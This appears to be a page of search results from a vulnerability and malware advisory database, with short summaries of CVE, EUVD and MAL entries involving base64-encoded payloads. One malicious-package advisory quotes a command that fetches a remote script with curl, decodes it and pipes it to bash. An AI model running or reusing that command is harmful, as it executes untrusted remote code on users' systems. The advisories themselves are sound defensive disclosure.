2007 matches found
Mesop AI Sandbox <= 1.2.2 - Remote Code Execution
Mesop <= 1.2.2 contains an unrestricted remote code execution vulnerability caused by unauthenticated ingestion and execution of base64-encoded Python code in the /exec-py endpoint of the ai/testing module, letting attackers execute arbitrary commands on the host. Exploitation requires HTTP access to the server. id:...
CVE-2016-20077 WordPress Plugin Photocart Link 1.6 Local File Inclusion via decode.php
WordPress Plugin Photocart Link 1.6 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in decode.php. Attackers can supply base64-encoded file paths in the 'id' parameter to the decode.php endpoin...
EUVD-2016-10889
WordPress Plugin Photocart Link 1.6 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in decode.php. Attackers can supply base64-encoded file paths in the 'id' parameter to the decode.php endpoin...
SolidInvoice Cross-Site Scripting Vulnerability
SolidInvoice is an open-source invoice processing application developed by SolidInvoice. Versions of SolidInvoice prior to 2.3.17 contained a cross-site scripting vulnerability. This vulnerability stemmed from the company logo upload feature not verifying file types. As a result, authenticated...
MAL-2026-4812 Malicious code in m-at-star-tools (PyPI)
Source: amazon-inspector 2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2 The package's sole consolescript m0scan m0scan/main.py:6-7 executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque...
Malicious code in midcorp (npm)
Source: amazon-inspector bc6725ed066ed5aff9452bd82d278fd89c1548768124d8b89cb8e5a5e8c3b05a The package masquerades as a pino-compatible logger package.json keywords fast/logger/stream/json, exports module.exports.pino = middleware, lib...
CVE-2019-25470 eWON Firmware 12.2-13.0 Authentication Bypass via wsdReadForm
eWON Firmware versions 12.2 to 13.0 contain an authentication bypass vulnerability that allows attackers with minimal privileges to retrieve sensitive user data by exploiting the wsdReadForm endpoint. Attackers can send POST requests to /wrcgi.bin/wsdReadForm with base64-encoded partial credentia...
CVE-2025-15514
CVE-2025-15514 affects Ollama 0.11.5-rc0 through 0.13.5, with a null pointer dereference in multi‑modal image processing. Malformed base64 image data passed to /api/chat can cause mtmd_helper_bitmap_init_from_buf to return NULL and be dereferenced, triggering a segmentation fault and DoS. Mitigat...
CVE-2018-18753
Typecho V1.1 allows remote attackers to send shell commands via base64-encoded serialized data, as demonstrated by SSRF...
MAL-2025-191946 Malicious code in gtkfuscator (PyPI)
Source: oracle-using-macaron 83b5a97c937ac16481e2ad27346069180a0a823c5f6b361cc4e7f08e97716c24 This package decompresses and executes a base64-encoded malicious payload...
EUVD-2017-15950
Malware in sbrugna...
EUVD-2010-1346
Malware in sbrugna...
EUVD-2005-0219
Malware in sbrugna...
EUVD-2008-5837
Malware in sbrugna...
EUVD-2024-1897
Malicious code in bioql PyPI...
EUVD-2022-29730
Malicious code in bioql PyPI...
EUVD-2025-19671
Malicious code in bioql PyPI...
EUVD-2025-19856
Malicious code in bioql PyPI...
EUVD-2022-2540
Malicious code in bioql PyPI...